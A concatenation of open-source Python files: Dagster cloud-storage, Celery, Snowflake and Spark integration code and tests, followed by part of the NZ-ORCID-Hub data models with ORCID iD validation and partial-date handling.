'host': {'env': 'REDSHIFT_ENDPOINT'},
'port': 5439,
'user': 'dagster',
'password': {'env': '<PASSWORD>'},
'database': 'dev',
}
}
}
},
mode_def=ModeDefinition(resource_defs={'redshift': redshift_resource}),
)
```
#### File: dagster_aws_tests/s3_tests/test_s3_file_cache.py
```python
import io
import boto3
from dagster_aws.s3 import S3FileCache, S3FileHandle
from moto import mock_s3
@mock_s3
def test_s3_file_cache_file_not_present():
s3 = boto3.client('s3')
s3.create_bucket(Bucket='some-bucket')
file_store = S3FileCache(
s3_bucket='some-bucket', s3_key='some-key', s3_session=s3, overwrite=False
)
assert not file_store.has_file_object('foo')
@mock_s3
def test_s3_file_cache_file_present():
s3 = boto3.client('s3')
s3.create_bucket(Bucket='some-bucket')
file_store = S3FileCache(
s3_bucket='some-bucket', s3_key='some-key', s3_session=s3, overwrite=False
)
assert not file_store.has_file_object('foo')
file_store.write_binary_data('foo', 'bar'.encode())
assert file_store.has_file_object('foo')
@mock_s3
def test_s3_file_cache_correct_handle():
s3 = boto3.client('s3')
s3.create_bucket(Bucket='some-bucket')
file_store = S3FileCache(
s3_bucket='some-bucket', s3_key='some-key', s3_session=s3, overwrite=False
)
assert isinstance(file_store.get_file_handle('foo'), S3FileHandle)
@mock_s3
def test_s3_file_cache_write_file_object():
s3 = boto3.client('s3')
s3.create_bucket(Bucket='some-bucket')
file_store = S3FileCache(
s3_bucket='some-bucket', s3_key='some-key', s3_session=s3, overwrite=False
)
stream = io.BytesIO('content'.encode())
file_store.write_file_object('foo', stream)
```
#### File: dagster_azure/adls2/utils.py
```python
import warnings
try:
# Centralise Azure imports here so we only need to warn in one place
from azure.core.exceptions import ResourceNotFoundError # pylint: disable=unused-import
from azure.storage.filedatalake import DataLakeServiceClient
except ImportError:
msg = (
"Could not import required Azure objects. This probably means you have an old version "
"of azure-storage-blob installed. dagster-azure requires azure-storage-blob~=12.0.0; "
"this conflicts with dagster-snowflake which requires azure-storage-blob<12.0.0 and is "
"incompatible. Please uninstall dagster-snowflake and reinstall dagster-azure to fix "
"this error."
)
warnings.warn(msg)
raise
def _create_url(storage_account, subdomain):
return "https://{}.{}.core.windows.net/".format(storage_account, subdomain)
def create_adls2_client(storage_account, credential):
"""
Create an ADLS2 client.
"""
account_url = _create_url(storage_account, "dfs")
return DataLakeServiceClient(account_url, credential)
__all__ = ['create_adls2_client', 'DataLakeServiceClient', 'ResourceNotFoundError']
```
#### File: dagster_azure/blob/utils.py
```python
import warnings
try:
# Centralise Azure imports here so we only need to warn in one place
from azure.core.exceptions import ResourceNotFoundError
from azure.storage.blob import (
generate_blob_sas,
BlobServiceClient,
)
except ImportError:
msg = (
"Could not import required Azure objects. This probably means you have an old version "
"of azure-storage-blob installed. dagster-azure requires azure-storage-blob~=12.0.0; "
"this conflicts with dagster-snowflake which requires azure-storage-blob<12.0.0 and is "
"incompatible. Please uninstall dagster-snowflake and reinstall dagster-azure to fix "
"this error."
)
warnings.warn(msg)
raise
def _create_url(storage_account, subdomain):
return "https://{}.{}.core.windows.net/".format(storage_account, subdomain)
def create_blob_client(storage_account, credential):
"""
Create a Blob Storage client.
"""
account_url = _create_url(storage_account, "blob")
if hasattr(credential, "account_key"):
credential = credential.account_key
return BlobServiceClient(account_url, credential)
__all__ = ['create_blob_client', 'generate_blob_sas', 'BlobServiceClient', 'ResourceNotFoundError']
```
#### File: dagster_azure_tests/adls2_tests/test_adls2_file_cache.py
```python
import io
from dagster_azure.adls2 import ADLS2FileCache, ADLS2FileHandle, FakeADLS2ServiceClient
def test_adls2_file_cache_file_not_present(storage_account, file_system, credential):
fake_client = FakeADLS2ServiceClient(storage_account, credential)
file_store = ADLS2FileCache(
storage_account=storage_account,
file_system=file_system,
prefix='some-prefix',
client=fake_client,
overwrite=False,
)
assert not file_store.has_file_object('foo')
def test_adls2_file_cache_file_present(storage_account, file_system, credential):
fake_client = FakeADLS2ServiceClient(storage_account, credential)
file_store = ADLS2FileCache(
storage_account=storage_account,
file_system=file_system,
prefix='some-prefix',
client=fake_client,
overwrite=False,
)
assert not file_store.has_file_object('foo')
file_store.write_binary_data('foo', 'bar'.encode())
assert file_store.has_file_object('foo')
def test_adls2_file_cache_correct_handle(storage_account, file_system, credential):
fake_client = FakeADLS2ServiceClient(storage_account, credential)
file_store = ADLS2FileCache(
storage_account=storage_account,
file_system=file_system,
prefix='some-prefix',
client=fake_client,
overwrite=False,
)
assert isinstance(file_store.get_file_handle('foo'), ADLS2FileHandle)
def test_adls2_file_cache_write_file_object(storage_account, file_system, credential):
fake_client = FakeADLS2ServiceClient(storage_account, credential)
file_store = ADLS2FileCache(
storage_account=storage_account,
file_system=file_system,
prefix='some-prefix',
client=fake_client,
overwrite=False,
)
stream = io.BytesIO('content'.encode())
file_store.write_file_object('foo', stream)
```
#### File: dagster_azure_tests/adls2_tests/test_adls2_file_manager.py
```python
import uuid
from dagster_azure.adls2 import (
ADLS2FileHandle,
ADLS2FileManager,
FakeADLS2Resource,
adls2_plus_default_storage_defs,
)
from dagster import (
InputDefinition,
Int,
ModeDefinition,
OutputDefinition,
ResourceDefinition,
execute_pipeline,
pipeline,
solid,
)
from dagster.seven import mock
# For deps
def test_adls2_file_manager_write(storage_account, file_system):
file_mock = mock.MagicMock()
adls2_mock = mock.MagicMock()
adls2_mock.get_file_client.return_value = file_mock
adls2_mock.account_name = storage_account
file_manager = ADLS2FileManager(adls2_mock, file_system, 'some-key')
foo_bytes = 'foo'.encode()
file_handle = file_manager.write_data(foo_bytes)
assert isinstance(file_handle, ADLS2FileHandle)
assert file_handle.account == storage_account
assert file_handle.file_system == file_system
assert file_handle.key.startswith('some-key/')
assert file_mock.upload_data.call_count == 1
file_handle = file_manager.write_data(foo_bytes, ext='foo')
assert isinstance(file_handle, ADLS2FileHandle)
assert file_handle.account == storage_account
assert file_handle.file_system == file_system
assert file_handle.key.startswith('some-key/')
assert file_handle.key[-4:] == '.foo'
assert file_mock.upload_data.call_count == 2
def test_adls2_file_manager_read(storage_account, file_system):
state = {'called': 0}
bar_bytes = 'bar'.encode()
class DownloadMock(mock.MagicMock):
def readinto(self, fileobj):
fileobj.write(bar_bytes)
class FileMock(mock.MagicMock):
def download_file(self):
state['called'] += 1
assert state['called'] == 1
return DownloadMock(file=self)
class ADLS2Mock(mock.MagicMock):
def get_file_client(self, *_args, **kwargs):
state['file_system'] = kwargs['file_system']
file_path = kwargs['file_path']
state['file_path'] = kwargs['file_path']
return FileMock(file_path=file_path)
adls2_mock = ADLS2Mock()
file_manager = ADLS2FileManager(adls2_mock, file_system, 'some-key')
file_handle = ADLS2FileHandle(storage_account, file_system, 'some-key/kdjfkjdkfjkd')
with file_manager.read(file_handle) as file_obj:
assert file_obj.read() == bar_bytes
assert state['file_system'] == file_handle.file_system
assert state['file_path'] == file_handle.key
# read again. cached
with file_manager.read(file_handle) as file_obj:
assert file_obj.read() == bar_bytes
file_manager.delete_local_temp()
def test_depends_on_adls2_resource_intermediates(storage_account, file_system):
@solid(
input_defs=[InputDefinition('num_one', Int), InputDefinition('num_two', Int)],
output_defs=[OutputDefinition(Int)],
)
def add_numbers(_, num_one, num_two):
return num_one + num_two
adls2_fake_resource = FakeADLS2Resource(storage_account)
@pipeline(
mode_defs=[
ModeDefinition(
system_storage_defs=adls2_plus_default_storage_defs,
resource_defs={'adls2': ResourceDefinition.hardcoded_resource(adls2_fake_resource)},
)
]
)
def adls2_internal_pipeline():
return add_numbers()
result = execute_pipeline(
adls2_internal_pipeline,
environment_dict={
'solids': {
'add_numbers': {'inputs': {'num_one': {'value': 2}, 'num_two': {'value': 4}}}
},
'storage': {'adls2': {'config': {'adls2_file_system': file_system}}},
},
)
assert result.success
assert result.result_for_solid('add_numbers').output_value() == 6
assert file_system in adls2_fake_resource.adls2_client.file_systems
keys = set()
for step_key, output_name in [('add_numbers.compute', 'result')]:
keys.add(create_adls2_key(result.run_id, step_key, output_name))
assert set(adls2_fake_resource.adls2_client.file_systems[file_system].keys()) == keys
def create_adls2_key(run_id, step_key, output_name):
return 'dagster/storage/{run_id}/intermediates/{step_key}/{output_name}'.format(
run_id=run_id, step_key=step_key, output_name=output_name
)
def test_depends_on_adls2_resource_file_manager(storage_account, file_system):
bar_bytes = 'bar'.encode()
@solid(output_defs=[OutputDefinition(ADLS2FileHandle)])
def emit_file(context):
return context.file_manager.write_data(bar_bytes)
@solid(input_defs=[InputDefinition('file_handle', ADLS2FileHandle)])
def accept_file(context, file_handle):
local_path = context.file_manager.copy_handle_to_local_temp(file_handle)
assert isinstance(local_path, str)
assert open(local_path, 'rb').read() == bar_bytes
adls2_fake_resource = FakeADLS2Resource(storage_account)
@pipeline(
mode_defs=[
ModeDefinition(
system_storage_defs=adls2_plus_default_storage_defs,
resource_defs={'adls2': ResourceDefinition.hardcoded_resource(adls2_fake_resource)},
)
]
)
def adls2_file_manager_test():
accept_file(emit_file())
result = execute_pipeline(
adls2_file_manager_test,
environment_dict={'storage': {'adls2': {'config': {'adls2_file_system': file_system}}}},
)
assert result.success
keys_in_bucket = set(adls2_fake_resource.adls2_client.file_systems[file_system].keys())
for step_key, output_name in [
('emit_file.compute', 'result'),
('accept_file.compute', 'result'),
]:
keys_in_bucket.remove(create_adls2_key(result.run_id, step_key, output_name))
assert len(keys_in_bucket) == 1
file_key = list(keys_in_bucket)[0]
comps = file_key.split('/')
assert '/'.join(comps[:-1]) == 'dagster/storage/{run_id}/files'.format(run_id=result.run_id)
assert uuid.UUID(comps[-1])
```
#### File: dagster_azure_tests/adls2_tests/test_object_store.py
```python
from dagster_azure.adls2 import ADLS2ObjectStore, FakeADLS2ServiceClient
from dagster_azure.blob import FakeBlobServiceClient
from dagster.core.storage.object_store import DEFAULT_SERIALIZATION_STRATEGY
def test_adls2_object_store(
storage_account, credential, file_system, caplog
): # pylint: disable=too-many-function-args
adls2_fake_client = FakeADLS2ServiceClient(storage_account, credential)
blob_fake_client = FakeBlobServiceClient(storage_account, credential)
key = 'foo'
# Uses mock ADLS2 client
adls2_obj_store = ADLS2ObjectStore(
file_system, adls2_client=adls2_fake_client, blob_client=blob_fake_client
)
res = adls2_obj_store.set_object(key, True, DEFAULT_SERIALIZATION_STRATEGY)
assert res.key == 'abfss://{fs}@{account}.dfs.core.windows.net/{key}'.format(
fs=file_system, account=storage_account, key=key
)
adls2_obj_store.set_object(key, True, DEFAULT_SERIALIZATION_STRATEGY)
assert 'Removing existing ADLS2 key' in caplog.text
assert adls2_obj_store.has_object(key)
assert adls2_obj_store.get_object(key, DEFAULT_SERIALIZATION_STRATEGY).obj is True
# Harder to test this since it requires a fake synchronised Blob client,
# since cp_object uses blob APIs to communicate...
# adls2_obj_store.cp_object(key, 'bar')
# assert adls2_obj_store.has_object('bar')
adls2_obj_store.rm_object(key)
assert not adls2_obj_store.has_object(key)
assert adls2_obj_store.uri_for_key(
key
) == 'abfss://{fs}@{account}.dfs.core.windows.net/{key}'.format(
fs=file_system, account=storage_account, key=key
)
```
#### File: dagster-celery/dagster_celery/tasks.py
```python
import hashlib
import six
from celery import Celery
from celery.utils.collections import force_mapping
from dagster_celery.config import CeleryConfig, CeleryK8sJobConfig
from dagster_graphql.client.mutations import handle_execute_plan_result, handle_execution_errors
from dagster_graphql.client.util import parse_raw_log_lines
from kombu import Queue
from dagster import DagsterInstance, EventMetadataEntry, check, seven
from dagster.core.definitions.reconstructable import ReconstructablePipeline
from dagster.core.events import EngineEventData
from dagster.core.execution.api import create_execution_plan, execute_plan_iterator
from dagster.core.execution.retries import Retries
from dagster.core.instance import InstanceRef
from dagster.serdes import serialize_dagster_namedtuple
from dagster.seven import is_module_available
from .engine import DELEGATE_MARKER, CeleryEngine, CeleryK8sJobEngine
def create_task(celery_app, **task_kwargs):
@celery_app.task(bind=True, name='execute_plan', **task_kwargs)
def _execute_plan(_self, instance_ref_dict, executable_dict, run_id, step_keys, retries_dict):
check.dict_param(instance_ref_dict, 'instance_ref_dict')
check.dict_param(executable_dict, 'executable_dict')
check.str_param(run_id, 'run_id')
check.list_param(step_keys, 'step_keys', of_type=str)
check.dict_param(retries_dict, 'retries_dict')
instance_ref = InstanceRef.from_dict(instance_ref_dict)
instance = DagsterInstance.from_ref(instance_ref)
pipeline = ReconstructablePipeline.from_dict(executable_dict)
retries = Retries.from_config(retries_dict)
pipeline_run = instance.get_run_by_id(run_id)
check.invariant(pipeline_run, 'Could not load run {}'.format(run_id))
step_keys_str = ", ".join(step_keys)
execution_plan = create_execution_plan(
pipeline,
pipeline_run.environment_dict,
mode=pipeline_run.mode,
step_keys_to_execute=pipeline_run.step_keys_to_execute,
).build_subset_plan(step_keys)
engine_event = instance.report_engine_event(
'Executing steps {} in celery worker'.format(step_keys_str),
pipeline_run,
EngineEventData(
[EventMetadataEntry.text(step_keys_str, 'step_keys'),], marker_end=DELEGATE_MARKER,
),
CeleryEngine,
step_key=execution_plan.step_key_for_single_step_plans(),
)
events = [engine_event]
for step_event in execute_plan_iterator(
execution_plan,
pipeline_run=pipeline_run,
environment_dict=pipeline_run.environment_dict,
instance=instance,
retries=retries,
):
events.append(step_event)
serialized_events = [serialize_dagster_namedtuple(event) for event in events]
return serialized_events
return _execute_plan
def create_k8s_job_task(celery_app, **task_kwargs):
@celery_app.task(bind=True, name='execute_step_k8s_job', **task_kwargs)
def _execute_step_k8s_job(
_self,
instance_ref_dict,
step_keys,
environment_dict,
mode,
repo_name,
repo_location_name,
run_id,
job_config_dict,
job_namespace,
load_incluster_config,
resources=None,
kubeconfig_file=None,
):
'''Run step execution in a K8s job pod.
'''
from dagster_k8s import DagsterK8sJobConfig, construct_dagster_graphql_k8s_job
from dagster_k8s.utils import get_pod_names_in_job, retrieve_pod_logs, wait_for_job_success
import kubernetes
check.dict_param(instance_ref_dict, 'instance_ref_dict')
check.list_param(step_keys, 'step_keys', of_type=str)
check.invariant(
len(step_keys) == 1, 'Celery K8s task executor can only execute 1 step at a time'
)
check.dict_param(environment_dict, 'environment_dict')
check.str_param(mode, 'mode')
check.str_param(repo_name, 'repo_name')
check.str_param(repo_location_name, 'repo_location_name')
check.str_param(run_id, 'run_id')
# Celery will serialize this as a list
job_config = DagsterK8sJobConfig.from_dict(job_config_dict)
check.inst_param(job_config, 'job_config', DagsterK8sJobConfig)
check.str_param(job_namespace, 'job_namespace')
check.bool_param(load_incluster_config, 'load_incluster_config')
resources = check.opt_inst_param(
resources, 'resources', kubernetes.client.V1ResourceRequirements
)
check.opt_str_param(kubeconfig_file, 'kubeconfig_file')
# For when launched via DinD or running the cluster
if load_incluster_config:
kubernetes.config.load_incluster_config()
else:
kubernetes.config.load_kube_config(kubeconfig_file)
instance_ref = InstanceRef.from_dict(instance_ref_dict)
instance = DagsterInstance.from_ref(instance_ref)
pipeline_run = instance.get_run_by_id(run_id)
check.invariant(pipeline_run, 'Could not load run {}'.format(run_id))
step_keys_str = ", ".join(step_keys)
# Ensure we stay below k8s name length limits
k8s_name_key = _get_k8s_name_key(run_id, step_keys)
job_name = 'dagster-stepjob-%s' % k8s_name_key
pod_name = 'dagster-stepjob-%s' % k8s_name_key
variables = {
'executionParams': {
'runConfigData': environment_dict,
'mode': mode,
'selector': {
'repositoryLocationName': repo_location_name,
'repositoryName': repo_name,
'pipelineName': pipeline_run.pipeline_name,
},
'executionMetadata': {'runId': run_id},
'stepKeys': step_keys,
}
}
args = ['-p', 'executePlan', '-v', seven.json.dumps(variables)]
job = construct_dagster_graphql_k8s_job(job_config, args, job_name, resources, pod_name)
# Running list of events generated from this task execution
events = []
# Post event for starting execution
engine_event = instance.report_engine_event(
'Executing steps {} in Kubernetes job {}'.format(step_keys_str, job.metadata.name),
pipeline_run,
EngineEventData(
[
EventMetadataEntry.text(step_keys_str, 'Step keys'),
EventMetadataEntry.text(job.metadata.name, 'Kubernetes Job name'),
EventMetadataEntry.text(pod_name, 'Kubernetes Pod name'),
EventMetadataEntry.text(job_config.job_image, 'Job image'),
EventMetadataEntry.text(job_config.image_pull_policy, 'Image pull policy'),
EventMetadataEntry.text(
str(job_config.image_pull_secrets), 'Image pull secrets'
),
EventMetadataEntry.text(
str(job_config.service_account_name), 'Service account name'
),
],
marker_end=DELEGATE_MARKER,
),
CeleryK8sJobEngine,
# validated above that step_keys is length 1, and it is not possible to use ETH or
# execution plan in this function (Celery K8s workers should not access to user code)
step_key=step_keys[0],
)
events.append(engine_event)
kubernetes.client.BatchV1Api().create_namespaced_job(body=job, namespace=job_namespace)
wait_for_job_success(job.metadata.name, namespace=job_namespace)
pod_names = get_pod_names_in_job(job.metadata.name, namespace=job_namespace)
# Post engine event for log retrieval
engine_event = instance.report_engine_event(
'Retrieving logs from Kubernetes Job pods',
pipeline_run,
EngineEventData([EventMetadataEntry.text('\n'.join(pod_names), 'Pod names')]),
CeleryK8sJobEngine,
step_key=step_keys[0],
)
events.append(engine_event)
logs = []
for pod_name in pod_names:
raw_logs = retrieve_pod_logs(pod_name, namespace=job_namespace)
logs += raw_logs.split('\n')
res = parse_raw_log_lines(logs)
handle_execution_errors(res, 'executePlan')
step_events = handle_execute_plan_result(res)
events += step_events
serialized_events = [serialize_dagster_namedtuple(event) for event in events]
return serialized_events
return _execute_step_k8s_job
def make_app(config=None):
config = check.opt_inst_param(config, 'config', (CeleryConfig, CeleryK8sJobConfig))
app_args = config.app_args() if config is not None else {}
app_ = Celery('dagster', **app_args)
if config is None:
app_.config_from_object('dagster_celery.defaults', force=True)
if is_module_available('dagster_celery_config'):
# pylint: disable=protected-access
obj = force_mapping(app_.loader._smart_import('dagster_celery_config'))
app_.conf.update(obj)
app_.loader.import_module('celery.contrib.testing.tasks')
app_.conf.task_queues = [
Queue('dagster', routing_key='dagster.#', queue_arguments={'x-max-priority': 10})
]
app_.conf.task_routes = {
'execute_plan': {'queue': 'dagster', 'routing_key': 'dagster.execute_plan'},
'execute_step_k8s_job': {'queue': 'dagster', 'routing_key': 'dagster.execute_step_k8s_job'},
}
app_.conf.task_queue_max_priority = 10
app_.conf.task_default_priority = 5
return app_
app = make_app()
execute_plan = create_task(app)
execute_step_k8s_job = create_k8s_job_task(app)
def _get_k8s_name_key(run_id, step_keys):
'''Creates a unique (short!) identifier to name k8s objects based on run ID and step key(s).
K8s Job names are limited to 63 characters, because they are used as labels. For more info, see:
https://kubernetes.io/docs/concepts/overview/working-with-objects/names/
'''
check.str_param(run_id, 'run_id')
check.list_param(step_keys, 'step_keys', of_type=str)
# Creates 32-bit signed int, so could be negative
name_hash = hashlib.md5(six.ensure_binary(run_id + '-'.join(step_keys)))
return name_hash.hexdigest()
```
#### File: dagster-snowflake/dagster_snowflake/solids.py
```python
from dagster import InputDefinition, Nothing, check, solid
def snowflake_solid_for_query(sql, parameters=None):
check.str_param(sql, 'sql')
check.opt_dict_param(parameters, 'parameters')
@solid(
input_defs=[InputDefinition('start', Nothing)],
required_resource_keys={'snowflake'},
tags={'kind': 'sql', 'sql': sql},
)
def snowflake_solid(context):
context.resources.snowflake.execute_query(sql=sql, parameters=parameters)
return snowflake_solid
```
#### File: dagster-spark/dagster_spark/utils.py
```python
import itertools
import os
from dagster import check
from .types import SparkSolidError
def flatten_dict(d):
def _flatten_dict(d, result, key_path=None):
'''Iterates an arbitrarily nested dictionary and yield dot-notation key:value tuples.
{'foo': {'bar': 3, 'baz': 1}, {'other': {'key': 1}} =>
[('foo.bar', 3), ('foo.baz', 1), ('other.key', 1)]
'''
for k, v in d.items():
new_key_path = (key_path or []) + [k]
if isinstance(v, dict):
_flatten_dict(v, result, new_key_path)
else:
result.append(('.'.join(new_key_path), v))
result = []
if d is not None:
_flatten_dict(d, result)
return result
def parse_spark_config(spark_conf):
'''For each key-value pair in spark conf, we need to pass to CLI in format:
--conf "key=value"
'''
spark_conf_list = flatten_dict(spark_conf)
return format_for_cli(spark_conf_list)
def format_for_cli(spark_conf_list):
return list(
itertools.chain.from_iterable([('--conf', '{}={}'.format(*c)) for c in spark_conf_list])
)
def construct_spark_shell_command(
application_jar,
main_class,
master_url=None,
spark_conf=None,
deploy_mode=None,
application_arguments=None,
spark_home=None,
):
'''Constructs the spark-submit command for a Spark job.
'''
check.opt_str_param(master_url, 'master_url')
check.str_param(application_jar, 'application_jar')
spark_conf = check.opt_dict_param(spark_conf, 'spark_conf')
check.opt_str_param(deploy_mode, 'deploy_mode')
check.opt_str_param(application_arguments, 'application_arguments')
check.opt_str_param(spark_home, 'spark_home')
spark_home = spark_home if spark_home else os.environ.get('SPARK_HOME')
if spark_home is None:
raise SparkSolidError(
(
'No spark home set. You must either pass spark_home in config or '
'set $SPARK_HOME in your environment (got None).'
)
)
master_url = ['--master', master_url] if master_url else []
deploy_mode = ['--deploy-mode', deploy_mode] if deploy_mode else []
spark_shell_cmd = (
['{}/bin/spark-submit'.format(spark_home), '--class', main_class]
+ master_url
+ deploy_mode
+ parse_spark_config(spark_conf)
+ [application_jar]
+ [application_arguments]
)
return spark_shell_cmd
``` |
{
"source": "jpeerz/NZ-ORCID-Hub",
"score": 2
} |
#### File: NZ-ORCID-Hub/orcid_hub/models.py
```python
import copy
import csv
import json
import os
import random
import re
import secrets
import string
import uuid
import validators
from collections import namedtuple
from datetime import datetime
from hashlib import md5
from io import StringIO
from itertools import zip_longest
from urllib.parse import urlencode
import yaml
from flask_login import UserMixin, current_user
from peewee import BooleanField as BooleanField_
from peewee import (JOIN, BlobField, CharField, DateTimeField, DeferredRelation, Field,
FixedCharField, ForeignKeyField, IntegerField, Model, OperationalError,
PostgresqlDatabase, ProgrammingError, SmallIntegerField, TextField, fn)
from playhouse.shortcuts import model_to_dict
from pycountry import countries
from pykwalify.core import Core
from pykwalify.errors import SchemaError
from peewee_validates import ModelValidator
from . import app, db
from .config import DEFAULT_COUNTRY, ENV
ORCID_ID_REGEX = re.compile(r"^([X\d]{4}-?){3}[X\d]{4}$")
PARTIAL_DATE_REGEX = re.compile(r"\d+([/\-]\d+){,2}")
AFFILIATION_TYPES = (
"student",
"education",
"staff",
"employment",
)
try:
from enum import IntFlag
except ImportError: # pragma: no cover
from enum import IntEnum as IntFlag
class ModelException(Exception):
"""Applicaton model exception."""
pass
def validate_orcid_id(value):
"""Validate ORCID iD (both format and the check-sum)."""
if not value:
return
if not ORCID_ID_REGEX.match(value):
raise ValueError(
f"Invalid ORCID iD {value}. It should be in the form of 'xxxx-xxxx-xxxx-xxxx' where x is a digit."
)
check = 0
for n in value:
if n == '-':
continue
check = (2 * check + int(10 if n == 'X' else n)) % 11
if check != 1:
raise ValueError(f"Invalid ORCID iD {value} checksum. Make sure you have entered correct ORCID iD.")
def lazy_property(fn):
"""Make a property lazy-evaluated."""
attr_name = '_lazy_' + fn.__name__
@property
def _lazy_property(self):
if not hasattr(self, attr_name):
setattr(self, attr_name, fn(self))
return getattr(self, attr_name)
return _lazy_property
class PartialDate(namedtuple("PartialDate", ["year", "month", "day"])):
"""Partial date (without month day or both month and month day."""
def as_orcid_dict(self):
"""Return ORCID dictionary representation of the partial date."""
if self.year is None and self.month is None and self.day is None:
return None
return dict(((f, None if v is None else {
"value": ("%04d" if f == "year" else "%02d") % v
}) for (f, v) in zip(self._fields, self)))
@classmethod
def create(cls, value):
"""Create a partial date form ORCID dictionary representation or string.
>>> PartialDate.create({"year": {"value": "2003"}}).as_orcid_dict()
{'year': {'value': '2003'}, 'month': None, 'day': None}
>>> PartialDate.create({"year": {"value": "2003"}}).year
2003
>>> PartialDate.create("2003").year
2003
>>> PartialDate.create("2003-03")
2003-03
>>> PartialDate.create("2003-07-14")
2003-07-14
>>> PartialDate.create("2003/03")
2003-03
>>> PartialDate.create("2003/07/14")
2003-07-14
>>> PartialDate.create("03/2003")
2003-03
>>> PartialDate.create("14/07/2003")
2003-07-14
"""
if value is None or value == {}:
return None
if isinstance(value, str):
match = PARTIAL_DATE_REGEX.search(value)
if not match:
raise ModelException(f"Wrong partial date value '{value}'")
value0 = match[0]
if '/' in value0:
parts = value0.split('/')
return cls(*[int(v) for v in (parts[::-1] if len(parts[-1]) > 2 else parts)])
return cls(*[int(v) for v in value0.split('-')])
return cls(**{k: int(v.get("value")) if v else None for k, v in value.items()})
def as_datetime(self):
"""Get 'datetime' data representation."""
return datetime(self.year, self.month, self.day)
def __str__(self):
"""Get string representation."""
if self.year is None:
return ''
else:
res = "%04d" % int(self.year)
if self.month:
res += "-%02d" % int(self.month)
return res + "-%02d" % int(self.day) if self.day else res
PartialDate.__new__.__defaults__ = (None, ) * len(PartialDate._fields)
class OrcidIdField(FixedCharField):
"""ORCID iD value DB field."""
def __init__(self, *args, **kwargs):
"""Initialize ORCID iD data field."""
if "verbose_name" not in kwargs:
kwargs["verbose_name"] = "ORCID iD"
if "max_length" not in kwargs:
kwargs["max_length"] = 19
super().__init__(*args, **kwargs)
# TODO: figure out where to place the value validation...
# def coerce(self, value):
# validate_orcid_id(value)
# return super().coerce(value)
class BooleanField(BooleanField_):
"""BooleanField extension to support inversion in queries."""
def NOT(self): # noqa: N802
"""Negate logical value in SQL."""
return self.__invert__()
class PartialDateField(Field):
"""Partial date custom DB data field mapped to varchar(10)."""
db_field = "varchar(10)"
def db_value(self, value):
"""Convert into partial ISO date textual representation: YYYY-**-**, YYYY-MM-**, or YYYY-MM-DD."""
if value is None or not value.year:
return None
else:
res = "%04d" % int(value.year)
if value.month:
res += "-%02d" % int(value.month)
else:
return res + "-**-**"
return res + "-%02d" % int(value.day) if value.day else res + "-**"
def python_value(self, value):
"""Parse partial ISO date textual representation."""
if value is None:
return None
parts = [int(p) for p in value.split("-") if "*" not in p]
return PartialDate(**dict(zip_longest((
"year",
"month",
"day",
), parts)))
class Role(IntFlag):
"""
Enum used to represent user role.
The model provide multi role support representing role sets as bitmaps.
"""
NONE = 0 # NONE
SUPERUSER = 1 # SuperUser
ADMIN = 2 # Admin
RESEARCHER = 4 # Researcher
TECHNICAL = 8 # Technical contact
ANY = 255 # ANY
def __eq__(self, other):
if isinstance(other, Role):
return self.value == other.value
return (self.name == other or self.name == getattr(other, 'name', None))
def __hash__(self):
return hash(self.name)
class Affiliation(IntFlag):
"""
Enum used to represent user affiliation (type) to the organisation.
The model provide multiple affiliations support representing role sets as bitmaps.
"""
NONE = 0 # NONE
EDU = 1 # Education
EMP = 2 # Employment
def __eq__(self, other):
if isinstance(other, Affiliation):
return self.value == other.value
return (self.name == other or self.name == getattr(other, 'name', None))
def __hash__(self):
return hash(self.name)
def __str__(self):
return ", ".join({
self.EDU: "Education",
self.EMP: "Employment"
}[a] for a in Affiliation if a & self)
class BaseModel(Model):
"""Encapsulate commont bits and pieces of the model classes."""
def field_is_updated(self, field_name):
"""Test if field is 'dirty'."""
return any(field_name == f.name for f in self.dirty_fields)
@classmethod
def get(cls, *query, **kwargs):
"""Get a single model instance."""
if query and not kwargs and len(query) == 1 and isinstance(query[0], int):
return super().get(id=query[0])
return super().get(*query, **kwargs)
@classmethod
def model_class_name(cls):
"""Get the class name of the model."""
return cls._meta.name
def __to_dashes(self, o):
"""Replace '_' with '-' in the dict keys."""
if isinstance(o, (list, tuple)):
return [self.__to_dashes(e) for e in o]
elif isinstance(o, dict):
return {k.replace('_', '-'): self.__to_dashes(v) for k, v in o.items()}
return o
def to_dict(self,
to_dashes=False,
recurse=True,
backrefs=False,
only=None,
exclude=None,
seen=None,
extra_attrs=None,
fields_from_query=None,
max_depth=None):
"""Get dictionary representation of the model."""
o = model_to_dict(
self,
recurse=recurse,
backrefs=backrefs,
only=only,
exclude=exclude,
seen=seen,
extra_attrs=extra_attrs,
fields_from_query=fields_from_query,
max_depth=max_depth)
for k, v in o.items():
if isinstance(v, PartialDate):
o[k] = str(v)
if to_dashes:
return self.__to_dashes(o)
return o
def reload(self):
"""Refresh the object from the DB."""
newer_self = self.get(self._meta.primary_key == self._get_pk_value())
for field_name in self._meta.fields.keys():
val = getattr(newer_self, field_name)
setattr(self, field_name, val)
self._dirty.clear()
class Meta: # noqa: D101,D106
database = db
only_save_dirty = True
class ModelDeferredRelation(DeferredRelation):
"""Fixed DefferedRelation to allow inheritance and mixins."""
def set_model(self, rel_model):
"""Include model in the generated "related_name" to make it unique."""
for model, field, name in self.fields:
if isinstance(field, ForeignKeyField) and not field._related_name:
field._related_name = "%s_%s_set" % (model.model_class_name(), name)
super().set_model(rel_model)
DeferredUser = ModelDeferredRelation()
class AuditMixin(Model):
"""Mixing for getting data necessary for data change audit trail maintenace."""
created_at = DateTimeField(default=datetime.utcnow)
updated_at = DateTimeField(null=True, default=None)
# created_by = ForeignKeyField(DeferredUser, on_delete="SET NULL", null=True)
# updated_by = ForeignKeyField(DeferredUser, on_delete="SET NULL", null=True)
def save(self, *args, **kwargs): # noqa: D102
if self.is_dirty():
self.updated_at = datetime.utcnow()
if current_user and hasattr(current_user, "id"):
if hasattr(self, "created_by") and self.created_by and hasattr(self, "updated_by"):
self.updated_by_id = current_user.id
elif hasattr(self, "created_by"):
self.created_by_id = current_user.id
return super().save(*args, **kwargs)
class File(BaseModel):
"""Uploaded image files."""
filename = CharField(max_length=100)
data = BlobField()
mimetype = CharField(max_length=30, db_column="mime_type")
token = FixedCharField(max_length=8, unique=True, default=lambda: secrets.token_urlsafe(8)[:8])
class Organisation(BaseModel, AuditMixin):
"""Research oranisation."""
country_choices = [(c.alpha_2, c.name) for c in countries]
country_choices.sort(key=lambda e: e[1])
country_choices.insert(0, ("", "Country"))
name = CharField(max_length=100, unique=True, null=True)
tuakiri_name = CharField(max_length=80, unique=True, null=True)
if ENV != "prod":
orcid_client_id = CharField(max_length=80, null=True)
orcid_secret = CharField(max_length=80, null=True)
else: # pragma: no cover
orcid_client_id = CharField(max_length=80, unique=True, null=True)
orcid_secret = CharField(max_length=80, unique=True, null=True)
confirmed = BooleanField(default=False)
